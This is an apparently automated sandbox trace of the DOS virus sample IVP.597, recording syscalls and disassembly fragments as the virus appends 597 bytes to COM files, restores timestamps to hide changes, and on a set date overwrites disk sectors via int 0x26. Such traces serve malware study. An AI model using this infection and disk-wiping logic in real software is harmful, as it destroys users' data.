Sample viewer

vx.netlux.org/Virus.DOS.IVP.597

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:15.478873473Z 26 PC: 13faf | Set disk transfer address
2018-12-17T22:58:15.481129647Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:58:15.482848714Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:58:15.48437881Z 71 PC: 13e92 | Get current directory
2018-12-17T22:58:15.487955683Z 78 PC: 13ed6 | Find first file
2018-12-17T22:58:15.495584237Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:15.503447599Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.51066698Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.513728865Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.532683514Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:15.540976202Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.545625114Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.547581502Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.550580293Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.560685088Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.563588356Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.584846294Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.598146431Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.601779017Z 61 PC: 13fba | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:15.609772563Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.617700683Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.621133089Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.63313935Z 61 PC: 13fba | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:15.641340134Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.64578596Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.647745819Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.650876909Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.661630759Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.663525616Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.672236153Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.684259601Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.687746289Z 61 PC: 13fba | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:15.715878783Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.731809272Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.742882145Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.753981966Z 61 PC: 13fba | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:15.762651535Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.766577338Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.7687534Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.772154357Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.784862837Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.78684217Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.795536258Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.807058428Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.810597871Z 61 PC: 13fba | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:15.818936657Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.827369597Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.830966359Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.842086474Z 61 PC: 13fba | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:15.850312388Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.853822055Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.855677428Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.858865191Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.868215Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.870310772Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.878769193Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.89017716Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.893306762Z 61 PC: 13fba | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:58:15.901185108Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.908570988Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.910884991Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.915970468Z 61 PC: 13fba | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:58:15.922085473Z 42 PC: 13fc6 | Get date
0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-17T22:58:15.924963059Z 76 PC: 13fd0 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:37.638605006Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:37.640132373Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:37.641301203Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:37.642385343Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:37.645587706Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:37.652107505Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:37.659152668Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:37.666499503Z 62 PC: 13eff | Close file
2018-12-25T12:36:37.668577168Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:37.963108965Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:37.971819231Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:37.975739236Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:37.977687103Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:37.980798857Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:37.992241424Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:37.993986676Z 62 PC: 13f91 | Close file
2018-12-25T12:36:38.001319189Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.009201585Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.011969232Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.017277683Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.022902328Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.024495738Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.033767242Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.040995905Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.045987343Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.04722193Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.04951906Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.055613971Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.057342616Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.185424728Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.306016235Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.310006206Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.3180301Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.326899642Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.328857542Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.401510185Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.41213556Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.416050838Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.427370166Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.434820553Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.447469586Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.450482702Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.460548491Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.473900195Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.477145283Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.484949472Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.493310014Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.495830294Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.50936085Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.520946685Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.524909479Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.526878014Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.530858089Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.541908251Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.544021397Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.553619864Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.56608977Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.569563831Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.577414457Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.587010285Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.589618261Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.595031325Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.601781416Z 42 PC: 13fc6 | Get date
0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:38.604722577Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.057643904Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.060055375Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.061197045Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.062565376Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.066301339Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.072075391Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.078425656Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.084940246Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.08667503Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:39.586890419Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.59399582Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:39.597250011Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:39.598891495Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:39.601968487Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:39.61238742Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:39.614183805Z 62 PC: 13f91 | Close file
2018-12-25T12:36:39.630400756Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.659395875Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.662271052Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.669389058Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.678217593Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.681009238Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.692310703Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.700911029Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.704047106Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.705801043Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.709926192Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.718434173Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.720246991Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:39.7294055Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.75358155Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.756240209Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.764407527Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.77718487Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.77928328Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.798734563Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.806970125Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.810108196Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.811950831Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.815058944Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.832751243Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.834837042Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.087367025Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.157952419Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.164429062Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.176121946Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.182960199Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.185088302Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.520952183Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.528942667Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:40.534019374Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:40.537298287Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:40.540987196Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.557919872Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.560680281Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.569033385Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.579459243Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.583206346Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.590378003Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.597222449Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.600157345Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.605084391Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.609781312Z 42 PC: 13fc6 | Get date
0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:40.612313709Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.081027223Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.08274203Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.083925741Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.085065047Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.088101043Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.095006128Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.107449251Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.114577927Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.128522965Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:38.401781324Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.409360024Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:38.415314266Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:38.420459783Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:38.42402321Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:38.434624892Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:38.436965427Z 62 PC: 13f91 | Close file
2018-12-25T12:36:38.446700843Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.468298481Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.471844977Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.479648319Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.48785786Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.491526816Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.503544767Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.511978Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.516434195Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.518441737Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.522145672Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.53316004Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.535390568Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.545460095Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.558321282Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.561815414Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.569616868Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.578175485Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.581088999Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.593028666Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.601655902Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.605732695Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.607145362Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.609618238Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.619026146Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.621611381Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.63185549Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.64423677Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.648288382Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.656054683Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.666136215Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.668631159Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.679198052Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.686276688Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.690399702Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.692610922Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.697026018Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.709051432Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.711121082Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.720350565Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.732194327Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.735572229Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.743560656Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.74875273Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.750151614Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.754522224Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.757693784Z 42 PC: 13fc6 | Get date
0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:38.759187949Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.119667452Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.121149138Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.122373843Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.123309432Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.126435771Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.132504759Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.143664761Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.149959569Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.152018647Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:39.579492407Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.596674667Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:39.602347129Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:39.603667473Z 44 PC: 13f69 | Get time
0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
